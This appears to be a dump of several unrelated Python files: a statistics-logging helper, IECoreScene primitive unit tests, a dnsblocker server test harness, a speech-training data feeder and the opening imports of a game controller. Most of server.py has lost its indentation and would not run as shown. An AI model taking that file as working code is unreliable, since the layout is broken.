                    elif msg.get_type() == stats.MessageType.SUBFOLDER:
                        self.subfolder = msg.get_name()
                    elif msg.get_type() == stats.MessageType.STARTTIME:
                        pass
                    elif msg.get_type() == stats.MessageType.NEW_LOGGER:
                        self.loggers[msg.get_name()] = []
                        path = self.subfolder + '/' + self.starttime + "_" + msg.get_name() + '.csv'
                        self.create_header(path, "'timestamp';'value'\n")
                    elif msg.get_type() == stats.MessageType.NEW_COUNTER:
                        self.counters[msg.get_name()] = 0
                        path = self.subfolder + '/' + self.starttime + '_counters.csv'
                        self.create_header(path,
                                           '\'' + '\';\''.join(['timestamp'] + list(self.counters.keys())) + '\'\n')
                    elif msg.get_type() == stats.MessageType.NEW_AVERAGER:
                        # BUGFIX: the new name must be wrapped in a list —
                        # `list + str` raised TypeError and killed the process
                        self.create_header(self.subfolder + '/' + self.starttime + '_averagers.csv',
                                           '\'' + '\';\''.join(['timestamp'] + list(self.averagers.keys()) + [msg.get_name()]) + '\'\n')
                        self.averagers[msg.get_name()] = 0
                    elif msg.get_type() == stats.MessageType.NEW_LOGGER_VAL:
                        self.loggers[msg.get_name()].append([msg.get_timestamp(), msg.get_value()])
                    elif msg.get_type() == stats.MessageType.NEW_COUNTER_VAL:
                        self.counters[msg.get_name()] = msg.get_value()
                    elif msg.get_type() == stats.MessageType.NEW_AVERAGER_VAL:
                        self.averagers[msg.get_name()] = msg.get_value()
                except Empty:
                    pass
                except (KeyboardInterrupt, SystemExit):
                    logging.info('Received keyboard interrupt, writing files to disk.')
                    break
                except Exception:
                    # BUGFIX: was a bare except with an uninformative message;
                    # record the actual traceback before shutting down
                    logging.exception('Unexpected error in statistics process')
                    break
            self.write()
            logging.info('Files written to disk.')

        def stop_logging(self, stats):
            """
            Stop recording of logs and close the background process.
            """
            self.queue.put_nowait(stats.Message(stats.MessageType.STOP))
            logging.info("Trying to stop logging thread/process.")
            self.process.join()
            self.queue.close()
            self.queue.join_thread()
            logging.info("Process joined.")
            sys.exit(0)

    def __init__(self, subfolder='.'):
        self.queue = Queue()
        self.statistics_thread = self.StatisticsThread(self.queue, self, subfolder)

    class Counter():
        """
        Simple incremental counter.
        """

        def __init__(self, name, queue, stats):
            self.name = name
            self.value = 0
            self.queue = queue
            self.stats = stats
            self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_COUNTER, name=self.name))

        def inc(self, increase_by=1):
            """
            Increment counter and publish the new value.
            """
            self.value += increase_by
            self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_COUNTER_VAL, name=self.name, value=self.value))

    class Averager():
        """
        Exponentially-weighted average of added values.
        """

        def __init__(self, name, queue, stats, weight=.2):
            self.name = name
            self.weight = weight
            self.val = 0
            self.queue = queue
            self.stats = stats
            self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_AVERAGER, name=self.name))

        def add_value(self, value):
            """
            Add current value, recalculate the running average and publish it.
            """
            self.val = value * self.weight + (1.0-self.weight) * self.val
            self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_AVERAGER_VAL, name=self.name, value=self.val))

    class TimestampLogger():
        """
        Log values with a timestamp.
        """

        def __init__(self, name, queue, stats):
            self.name = name
            self.queue = queue
            self.stats = stats
            self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_LOGGER, name=self.name))

        def timestamp(self, timestamp=-1, value=0):
            """
            Add a new measurement value; -1 means "stamp with the current time".
            """
            if timestamp == -1:
                timestamp = int(time.monotonic() * 1000)
            self.queue.put_nowait(self.stats.Message(self.stats.MessageType.NEW_LOGGER_VAL,
                                                     name=self.name, value=value,
                                                     timestamp=timestamp))

    def new_averager(self, name):
        """
        Create a new averager proxy registered with the logging process.
        """
        avg = self.Averager(name, self.queue, self)
        return avg

    def new_counter(self, name):
        """
        Create a new counter proxy registered with the logging process.
        """
        cnt = self.Counter(name, self.queue, self)
        return cnt

    def new_logger(self, name):
        """
        Create a new timestamped logger proxy registered with the logging process.
        """
        tsl = self.TimestampLogger(name, self.queue, self)
        return tsl

    def stop_logging(self):
        """
        Stop the logger and kill the logging process (exits the interpreter).
        """
        self.statistics_thread.stop_logging(self)
|
PrimitiveTest.py | ##########################################################################
#
# Copyright (c) 2008-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import time
import threading
import imath
import IECore
import IECoreScene
class PrimitiveTest( unittest.TestCase ) :
    """Unit tests for IECoreScene.Primitive: interpolation inference, copying,
    serialisation, hashing, primitive-variable validity and load cancellation."""

    def test( self ) :
        # A two-triangle mesh: 2 faces, 4 vertices, 6 face-varying corners
        m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
        # inferInterpolation from an element count
        self.assertEqual( m.inferInterpolation( 1 ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
        self.assertEqual( m.inferInterpolation( 2 ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
        self.assertEqual( m.inferInterpolation( 4 ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
        self.assertEqual( m.inferInterpolation( 6 ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
        self.assertEqual( m.inferInterpolation( 0 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
        self.assertEqual( m.inferInterpolation( 10 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
        # inferInterpolation from actual data objects
        self.assertEqual( m.inferInterpolation( IECore.FloatData( 1 ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
        self.assertEqual( m.inferInterpolation( IECore.V3fVectorData( [ imath.V3f( 1 ) ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
        self.assertEqual( m.inferInterpolation( IECore.FloatVectorData( [ 2, 3 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
        self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
        self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
        self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6, 7 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )

    def testCopyFrom( self ) :
        # copyFrom must make the target equal to the source, including primvars
        m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
        m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
        m2 = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 3, 2, 1 ] ) )
        m2["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) )
        self.assertNotEqual( m, m2 )
        m2.copyFrom( m )
        self.assertEqual( m, m2 )

    def testLoad( self ) :
        # Round-trip a mesh (with indexed primvar) through the .cob serialiser
        # NOTE(review): writes to a fixed /tmp path and never cleans it up
        m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
        m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) )
        m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
        self.assertTrue( m.arePrimitiveVariablesValid() )
        IECore.Writer.create( m, "/tmp/testPrimitiveLoad.cob" ).write()
        m2 = IECore.Reader.create( "/tmp/testPrimitiveLoad.cob" ).read()
        self.assertTrue( m2.arePrimitiveVariablesValid() )
        self.assertEqual( m, m2 )

    def testHash( self ) :
        # Every mutation (new primvar, data edit, indices edit) must change the hash
        hashes = []
        m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
        hashes.append( m.hash() )
        m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
        for h in hashes :
            self.assertNotEqual( h, m.hash() )
        hashes.append( m.hash() )
        m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
        for h in hashes :
            self.assertNotEqual( h, m.hash() )
        hashes.append( m.hash() )
        m["a"].data[0] = 2
        for h in hashes :
            self.assertNotEqual( h, m.hash() )
        hashes.append( m.hash() )
        m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) )
        for h in hashes :
            self.assertNotEqual( h, m.hash() )
        hashes.append( m.hash() )
        m["b"].indices[0] = 1
        for h in hashes :
            self.assertNotEqual( h, m.hash() )
        hashes.append( m.hash() )

    def testPrimitiveVariableDataValidity( self ) :
        m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
        # only vector data
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ) ) ) )
        # constant can be anything
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) ) ) )
        # data size matches interpolation
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3, 4 ] ) ) ) )
        # data size (not base size) matches interpolation
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3) ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) ) ) )

    def testPrimitiveVariableIndicesValidity( self ) :
        m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
        # only vector data
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
        # constant needs to be vector data if there are indices
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ), IECore.IntVectorData( [ 0 ] ) ) ) )
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
        # indices must be in range
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 1 ] ) ) ) )
        # indices size matches interpolation, regardless of data size
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) ) ) )
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )
        self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
        # except for constant which can have any number of indices
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0, 0 ] ) ) ) )
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0 ] ) ) ) )
        self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) ) ) )

    def testVariableIndexedView( self ) :
        # The real checks live on the C++ side
        IECoreScene.testVariableIndexedView()

    @unittest.skipIf( IECore.TestUtil.inMacCI(), "Mac CI is too slow for reliable timing" )
    def testCancelLoading( self ) :
        # Build a large mesh so that loading takes long enough to be cancelled mid-way
        strip = IECoreScene.MeshPrimitive.createPlane( imath.Box2f( imath.V2f( 0 ), imath.V2f( 100000, 1 ) ), imath.V2i( 1000000, 1 ) )
        testData = IECore.FloatVectorData( [0] * ( len( strip["P"].data ) ) )
        for i in range( 10 ):
            q = IECore.FloatVectorData( testData )
            q[0] = i
            strip["var%i" % i] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, q )
        saveIO = IECore.MemoryIndexedIO( IECore.CharVectorData(), IECore.IndexedIO.OpenMode.Write )
        strip.save( saveIO, "test" )
        loadIO = IECore.MemoryIndexedIO( saveIO.buffer(), IECore.IndexedIO.OpenMode.Read )
        canceller = IECore.Canceller()
        cancelled = [False]
        def backgroundRun():
            try:
                IECore.Object.load( loadIO, "test", canceller )
            except IECore.Cancelled:
                cancelled[0] = True
        thread = threading.Thread(target=backgroundRun, args=())
        startTime = time.time()
        thread.start()
        # Give the load a head start, then cancel; it must abort promptly
        time.sleep( 0.05 )
        canceller.cancel()
        thread.join()
        # NOTE(review): wall-clock timing assertion — may be flaky on loaded machines
        self.assertLess( time.time() - startTime, 0.1 )
        self.assertTrue( cancelled[0] )
# Allow running this test module directly from the command line
if __name__ == "__main__":
    unittest.main()
|
server.py | import os
import signal
import random
import time
import errno
import getpass
import shutil
import threading
from subprocess import Popen, PIPE
from . management import Manager
class Server(Manager):
def __init__(self, **kwargs):
super().__init__()
self._server_process = None
self._dns_proxy_port = random.randint(64500, 64550)
self._address = kwargs.pop("address", "127.0.0.1")
self._service_port = kwargs.pop(
"service_port", random.randint(64555, 64580)
)
self._server_pid = None
self._pidfile = os.path.join(
self._virtual_env_root,
"tmp",
"dbl-test-%s.pid" % self._instance_id
)
self._server_params = kwargs.pop("params", {})
self._templates_dir = os.path.join(
self._project_root,
"service",
"etc",
"dnsblocker",
"templates"
)
self._dns_proxy_config_destdir = os.path.join(
self._virtual_env_root,
"var",
"run",
"dnsblocker-%s" % self._instance_id
)
self._stop_threads_flag = False
def tail_logfile(self):
with open(self._logfile, "r") as handle:
while not self._stop_threads_flag:
data = handle.read()
if data:
self._logger.info(data.rstrip())
def _setup_env(self):
#self._logger.info("Setting env")
os.makedirs(self._dns_proxy_config_destdir)
with open(self._logfile, "w+") as lh:
lh.write("# Test case log\n")
def _cleanup(self):
shutil.rmtree(self._dns_proxy_config_destdir)
try:
os.unlink(self._pidfile)
except OSError as e:
if e.errno != errno.ENOENT:
self._logger.error(e)
print(e)
def get_pid(self):
return self._server_pid
def get_pidfile_path(self):
return self._pidfile
def get_address(self):
return self._address
def get_port(self):
return self._service_port
def get_dns_port(self):
return self._dns_proxy_port
def __enter__(self):
self._setup_env()
if self._verbose:
self._tail_thread = threading.Thread(target=self.tail_logfile)
self._tail_thread.start()
executable = os.path.join(
self._project_root, "service", "bin", "dnsblocker")
cmd = [
executable,
"-D",
"-v",
#"-f",
#"--no-chdir",
#"--no-close-fds",
"--no-system-dns-proxy",
"--no-update",
"--pidfile", self._pidfile,
"--logfile", self._logfile,
"--logger-config-path", self._log_config_path,
"--network-ip4address", self.get_address(),
"--dns-proxy", "unbound",
"--dns-proxy-generate-config",
"--dns-proxy-port", str(self._dns_proxy_port),
"--dns-proxy-config-destdir", self._dns_proxy_config_destdir,
"--service-user", getpass.getuser(),
"--service-port", str(self._service_port),
"--db", self._db,
"--templates-dir", self._templates_dir,
]
for sparam in self._server_params:
option = sparam
if not option.startswith("--"):
option = "--" + sparam
cmd.extend([option, str(self._server_params[sparam])])
if self._verbose:
self._logger.debug(" ".join(cmd))
self._server_process = Popen(cmd, stdout=PIPE, shell=False)
wait = 25
#self._logger.debug("Waiting for pidfile")
while wait and not os.path.isfile(self._pidfile):
time.sleep(0.1)
wait -= 1
if not os.path.isfile(self._pidfile):
self._stop_threads_flag = True
raise Exception("Server startup failed")
wait = 10
try:
with open(self._pidfile, "r") as fh:
self._server_pid = int(fh.read())
while wait and (os.kill(self._server_pid, 0) is not None):
time.sleep(0.1)
wait -= 1
if os.kill(self._server_pid, 0) is not None:
raise Exception("Server startup failed")
except Exception as e:
self._logger.exception(e)
self._stop_threads_flag = True
#self._logger.debug("### Server: Server ready")
return self
    def __exit__(self, tp, value, tb):
        """Stop the server: SIGTERM, wait up to ~10s, escalate to SIGKILL.

        Reads the pid back from the pidfile rather than trusting
        self._server_pid, then cleans up threads and temp state.
        """
        with open(self._pidfile, "r") as fh:
            pid = int(fh.read())
        wait = 500
        try:
            #self._logger.debug("### Stopping server %d" % pid)
            os.kill(pid, signal.SIGTERM)
            is_alive = True
            # os.kill(pid, 0) returns None while the process exists and
            # raises OSError(ESRCH) once it is gone.
            while wait and is_alive:
                try:
                    is_alive = (os.kill(pid, 0) is None)
                    if is_alive:
                        time.sleep(0.02)
                        wait -= 1
                    else:
                        break
                except OSError as e:
                    if e.errno == errno.ESRCH:
                        break
            # Still alive after the grace period: force-kill.
            if os.kill(pid, 0) is None:
                self._logger.error("Killing with SIGKILL")
                os.kill(pid, signal.SIGKILL)
            self._logger.debug("### Server: Server stopped")
        except OSError as e:
            # ESRCH means the process already exited — that is success.
            if e.errno != errno.ESRCH:
                self._logger.exception(e)
                raise
        if self._verbose:
            # Stop the log-tailing thread started in __enter__.
            self._stop_threads_flag = True
            self._tail_thread.join()
        self._cleanup()
|
Feeder.py | import numpy as np
import json, os, time, pickle, librosa
from collections import deque
from threading import Thread
from random import shuffle
from Audio import melspectrogram
# Module-wide hyper-parameter dictionary, loaded once at import time.
with open('Hyper_Parameters.json', 'r') as f:
    hp_Dict = json.load(f)
class Feeder:
    """Supply training batches and inference inputs to the model.

    In training mode a daemon thread continuously builds padded
    (mel, token) batches into ``pattern_Queue``; ``Get_Train_Pattern``
    pops them.  ``Get_Inference_Pattern`` builds mel patterns directly
    from wav files on demand.
    """
    def __init__(self, is_Training= False):
        # is_Training: when True, start the background batch-generator thread.
        self.is_Training = is_Training
        self.Metadata_Load()
        if self.is_Training:
            # Queue of ready batches, filled by Train_Pattern_Generate.
            self.pattern_Queue = deque()
            pattern_Generate_Thread = Thread(target=self.Train_Pattern_Generate)
            pattern_Generate_Thread.daemon = True
            pattern_Generate_Thread.start()

    def Metadata_Load(self):
        """Load the token table and (when training) the pattern metadata,
        verifying both are consistent with the hyper parameters.

        Raises ValueError on any mismatch.
        """
        with open(hp_Dict['Token_JSON_Path'], 'r') as f:
            self.token_Index_Dict = json.load(f)
        if self.is_Training:
            with open(os.path.join(hp_Dict['Train']['Pattern_Path'], hp_Dict['Train']['Metadata_File']).replace('\\', '/'), 'rb') as f:
                self.metadata_Dict = pickle.load(f)
            # The token table used to build the patterns must match the current one.
            if not all([
                self.token_Index_Dict[key] == self.metadata_Dict['Token_Index_Dict'][key]
                for key in self.token_Index_Dict.keys()
                ]):
                raise ValueError('The token information of metadata information and hyper parameter is not consistent.')
            # The audio settings used to build the patterns must match as well.
            elif not all([
                self.metadata_Dict['Spectrogram_Dim'] == hp_Dict['Sound']['Spectrogram_Dim'],
                self.metadata_Dict['Mel_Dim'] == hp_Dict['Sound']['Mel_Dim'],
                self.metadata_Dict['Frame_Shift'] == hp_Dict['Sound']['Frame_Shift'],
                self.metadata_Dict['Frame_Length'] == hp_Dict['Sound']['Frame_Length'],
                self.metadata_Dict['Sample_Rate'] == hp_Dict['Sound']['Sample_Rate'],
                self.metadata_Dict['Max_Abs_Mel'] == hp_Dict['Sound']['Max_Abs_Mel'],
                ]):
                raise ValueError('The metadata information and hyper parameter setting are not consistent.')

    def Train_Pattern_Generate(self):
        """Endless producer loop (daemon thread): build shuffled, padded
        batches and append them to ``pattern_Queue``."""
        # Wav-length limits expressed in mel frames.
        min_Mel_Length = hp_Dict['Train']['Min_Wav_Length'] / hp_Dict['Sound']['Frame_Shift']
        max_Mel_Length = hp_Dict['Train']['Max_Wav_Length'] / hp_Dict['Sound']['Frame_Shift']
        # Keep only the files whose mel length falls inside [min, max].
        path_List = [
            (path, self.metadata_Dict['Mel_Length_Dict'][path])
            for path in self.metadata_Dict['File_List']
            if self.metadata_Dict['Mel_Length_Dict'][path] >= min_Mel_Length and self.metadata_Dict['Mel_Length_Dict'][path] <= max_Mel_Length
            ]
        print(
            'Train pattern info', '\n',
            'Total pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict'])), '\n',
            'Use pattern count: {}'.format(len(path_List)), '\n',
            'Excluded pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict']) - len(path_List))
            )
        if hp_Dict['Train']['Pattern_Sorting']:
            # Sort by mel length so each batch holds similar lengths (less padding).
            path_List = [file_Name for file_Name, _ in sorted(path_List, key=lambda x: x[1])]
        else:
            path_List = [file_Name for file_Name, _ in path_List]
        while True:
            if not hp_Dict['Train']['Pattern_Sorting']:
                shuffle(path_List)
            path_Batch_List = [
                path_List[x:x + hp_Dict['Train']['Batch_Size']]
                for x in range(0, len(path_List), hp_Dict['Train']['Batch_Size'])
                ]
            shuffle(path_Batch_List)
            #path_Batch_List = path_Batch_List[0:2] + list(reversed(path_Batch_List))  # Code to check batch-size adequacy; no problem if it survives 10+ iterations.
            batch_Index = 0
            while batch_Index < len(path_Batch_List):
                # Throttle when the consumer is lagging behind.
                if len(self.pattern_Queue) >= hp_Dict['Train']['Max_Pattern_Queue']:
                    time.sleep(0.1)
                    continue
                pattern_Count = len(path_Batch_List[batch_Index])
                mel_List = []
                token_List = []
                for file_Path in path_Batch_List[batch_Index]:
                    with open(os.path.join(hp_Dict['Train']['Pattern_Path'], file_Path).replace('\\', '/'), 'rb') as f:
                        pattern_Dict = pickle.load(f)
                    mel_List.append(pattern_Dict['Mel'])
                    token_List.append(pattern_Dict['Token'])
                # Pad mels with zeros; pad tokens with <E> and prepend <S>
                # (hence the +2 on the max token length).
                max_Mel_Length = max([mel.shape[0] for mel in mel_List])
                max_Token_Length = max([token.shape[0] for token in token_List]) + 2
                new_Mel_Pattern = np.zeros(
                    shape=(pattern_Count, max_Mel_Length, hp_Dict['Sound']['Mel_Dim']),
                    dtype= np.float32
                    )
                new_Token_Pattern = np.zeros(
                    shape=(pattern_Count, max_Token_Length),
                    dtype= np.int32
                    ) + self.token_Index_Dict['<E>']
                new_Token_Pattern[:, 0] = self.token_Index_Dict['<S>']
                for pattern_Index, (mel, token) in enumerate(zip(mel_List, token_List)):
                    new_Mel_Pattern[pattern_Index, :mel.shape[0]] = mel
                    new_Token_Pattern[pattern_Index, 1:token.shape[0] + 1] = token
                self.pattern_Queue.append({
                    'mels': new_Mel_Pattern,
                    'mel_lengths': np.array([mel.shape[0] for mel in mel_List], dtype=np.int32),
                    'tokens': new_Token_Pattern,
                    'token_lengths': np.array([token.shape[0] + 1 for token in token_List], dtype=np.int32) #Only one of <S> or <E> is used.
                    })
                batch_Index += 1

    def Get_Train_Pattern(self):
        """Pop the next ready batch, busy-waiting until one is available."""
        while len(self.pattern_Queue) == 0: #When training speed is faster than making pattern, model should be wait.
            time.sleep(0.01)
        return self.pattern_Queue.popleft()

    def Get_Inference_Pattern(self, wav_Path_List):
        """Build padded mel patterns plus initial <S> tokens from wav files."""
        pattern_Count = len(wav_Path_List)
        # Load, trim silence (top_db=15), attenuate slightly, then compute
        # the mel spectrogram transposed to (time, mel) order.
        mel_List = [
            np.transpose(melspectrogram(
                y= librosa.effects.trim(librosa.core.load(path, sr= hp_Dict['Sound']['Sample_Rate'])[0], top_db=15)[0] * 0.99,
                num_freq= hp_Dict['Sound']['Spectrogram_Dim'],
                frame_shift_ms= hp_Dict['Sound']['Frame_Shift'],
                frame_length_ms= hp_Dict['Sound']['Frame_Length'],
                num_mels= hp_Dict['Sound']['Mel_Dim'],
                sample_rate= hp_Dict['Sound']['Sample_Rate'],
                max_abs_value= hp_Dict['Sound']['Max_Abs_Mel']
                )).astype(np.float32)
            for path in wav_Path_List
            ]
        max_Mel_Length = max([mel.shape[0] for mel in mel_List])
        new_Mel_Pattern = np.zeros(
            shape=(pattern_Count, max_Mel_Length, hp_Dict['Sound']['Mel_Dim']),
            dtype= np.float32
            )
        for pattern_Index, mel in enumerate(mel_List):
            new_Mel_Pattern[pattern_Index, :mel.shape[0]] = mel
        new_Token_Pattern = np.zeros(
            shape=(pattern_Count, 1),
            dtype= np.int32
            ) + self.token_Index_Dict['<S>']
        return {
            'mels': new_Mel_Pattern,
            'mel_lengths': np.array([mel.shape[0] for mel in mel_List], dtype=np.int32),
            'initial_tokens': new_Token_Pattern
            }
if __name__ == '__main__':
    # Smoke test: start the feeder in training mode and watch the queue fill.
    new_Feeder = Feeder(is_Training= True)
    while True:
        print(len(new_Feeder.pattern_Queue))
        time.sleep(1.0)
gamecontroller.py | import os
import time
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
